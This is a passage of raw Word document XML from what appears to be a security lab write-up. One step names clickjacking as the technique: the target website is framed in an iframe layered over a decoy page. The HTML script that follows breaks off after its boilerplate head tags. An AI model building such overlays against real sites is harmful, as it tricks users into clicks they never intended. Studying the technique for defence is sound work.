rVr46tD/AJdzPT5PrNL93P3Z&#10;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&#10;DciQ8KviLeeJzDgYWCyTOeg80//p8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M0mKdVLBAAAlQ8AAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0ACgAAAAAAAAAhADewANUv3gAAL94AABQAAAAAAAAAAAAAAAAAtAYAAGRycy9tZWRpYS9pbWFn&#10;ZTEuanBnUEsBAi0AFAAGAAgAAAAhAFdc56TdAAAABQEAAA8AAAAAAAAAAAAAAAAAFeUAAGRycy9k&#10;b3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAAB/mAABk&#10;cnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAABDnAAAAAA==&#10;">
                <v:rect id="Rectangle 3554" o:spid="_x0000_s1292" style="position:absolute;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42301C34" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3555" o:spid="_x0000_s1293" style="position:absolute;top:2026;width:1422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5F9288B6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Website Started</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3556" o:spid="_x0000_s1294" style="position:absolute;left:10697;top:2026;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20A23359" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3557" o:spid="_x0000_s1295" style="position:absolute;left:59448;top:36125;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3DBB9E14" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3566" o:spid="_x0000_s1296" type="#_x0000_t75" style="position:absolute;left:383;top:3890;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ehZxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5Qm91Y1Wo01dpbQUPBVMxPMz+/Knzb4N2W2Mfnq3IHgcZuY3zGozmEb01LnasoLJOAJB&#10;nFtdc6lgn309L0E4j6yxsUwKzuRgs358WGGi7Yl31Ke+FAHCLkEFlfdtIqXLKzLoxrYlDl5hO4M+&#10;yK6UusNTgJtGTqMolgZrDgsVtvRRUf6b/hkFn1N3WeBhecyK7Keh1+9ZX6RbpZ5Gw/sbCE+Dv4dv&#10;7a1W8DKPY/h/E56AXF8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAa+HoWcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId92" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3567" o:spid="_x0000_s1297" style="position:absolute;left:256;top:3763;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1HxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvgv9haMGbTnxslOgo4mPZoy9Y9tZk2iSY6QmZ0cR/v7Ow4LGoqq+o5bo1pXhS7QrLCkbDCARx&#10;anXBmYLr5TCYg3AeWWNpmRS8yMF61e0sMdG24RM9zz4TAcIuQQW591UipUtzMuiGtiIO3s3WBn2Q&#10;dSZ1jU2Am1KOoyiWBgsOCzlWtM0pvZ8fRsG+GX/7n+PnfT66WV1Nsx1Pjhel+r12swDhqfXv8H/7&#10;SyuYfMQz+HsTnoBc/QIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCJTr1HxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249A14B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDA791" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD2400A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:sectPr w:rsidR="00F97B52">
          <w:headerReference w:type="even" r:id="rId93"/>
          <w:headerReference w:type="default" r:id="rId94"/>
          <w:footerReference w:type="even" r:id="rId95"/>
          <w:footerReference w:type="default" r:id="rId96"/>
          <w:headerReference w:type="first" r:id="rId97"/>
          <w:footerReference w:type="first" r:id="rId98"/>
          <w:pgSz w:w="11911" w:h="16841"/>
          <w:pgMar w:top="1620" w:right="1328" w:bottom="1203" w:left="1340" w:header="480" w:footer="478" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEF9BB9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1340" w:right="9991"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10836" w:type="dxa"/>
        <w:tblInd w:w="-801" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="801" w:type="dxa"/>
          <w:bottom w:w="182" w:type="dxa"/>
          <w:right w:w="734" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10836"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="799BDAE7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="15766"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10836" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="6" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1635C4C1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="333332"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Step </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="333332"/>
              </w:rPr>
              <w:t>2 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333332"/>
              </w:rPr>
              <w:t xml:space="preserve"> Clickjacking attacks use CSS to create and manipulate layers. Incorporate the target website as an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333332"/>
              </w:rPr>
              <w:t>iframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333332"/>
              </w:rPr>
              <w:t xml:space="preserve"> layer overlaid on the decoy website. The script used is mentioned below: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C9CA99" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>DOCTYPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="036E290D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="4"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>lang</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>en</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3429868E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>head</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="381BBD38"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meta</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>charset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"UTF-8"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B36D9B3"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meta</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>http-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>equiv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"X-UA-Compatible"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"IE=edge"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="224A5F07" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="4"/>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meta</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"viewport"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"width=device-width, initial-scale=1.0"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
